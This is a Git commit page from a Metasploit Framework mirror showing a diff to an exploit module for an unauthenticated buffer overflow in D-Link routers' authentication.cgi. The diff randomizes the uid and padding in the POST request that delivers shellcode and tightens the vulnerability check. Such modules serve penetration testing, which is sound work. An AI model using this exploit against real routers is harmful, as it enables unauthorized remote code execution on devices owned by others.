infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do some randomizations

bug/bundler_fix
jvazquez-r7 2014-06-20 11:38:10 -05:00
parent f26f8ae5db
commit f0d04fe77e
1 changed files with 10 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/exploits/linux/http/dlink_authentication_cgi_bof.rb
View File

@ -17,10 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'D-Link authentication.cgi Buffer Overflow', 'Name' => 'D-Link authentication.cgi Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different D-Link routers. This module exploits an remote buffer overflow vulnerability on different D-Link routers.
This module has been tested successfully on D-Link DIR645A1_FW103B11. Different other devices like the The vulnerability exists in the handling of HTTP queries to the authentication.cgi with
DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated long password values. The vulnerability can be exploitable without authentication. This
environment. They are a little bit different in the first ROP gadget. module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares
like the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.
}, },
'Author' => 'Author' =>
[ [
@ -63,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'GET' 'method' => 'GET'
}) })
if res && [200, 301, 302].include?(res.code) if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /status.*uid/
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
@ -113,17 +114,16 @@ class Metasploit3 < Msf::Exploit::Remote
def execute_command(cmd, opts) def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd) shellcode = prepare_shellcode(cmd)
uid = rand_text_alpha(4)
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
#'uri' => "/authentication_gdb.cgi", #for debugging on the router
'uri' => "/authentication.cgi", 'uri' => "/authentication.cgi",
'cookie' => "uid=test", 'cookie' => "uid=#{uid}",
'encode_params' => false, 'encode_params' => false,
'vars_post' => { 'vars_post' => {
'uid' => 'test', 'uid' => uid,
'password' => 'asd' << shellcode, 'password' => rand_text_alpha(3) + shellcode,
} }
}) })
return res return res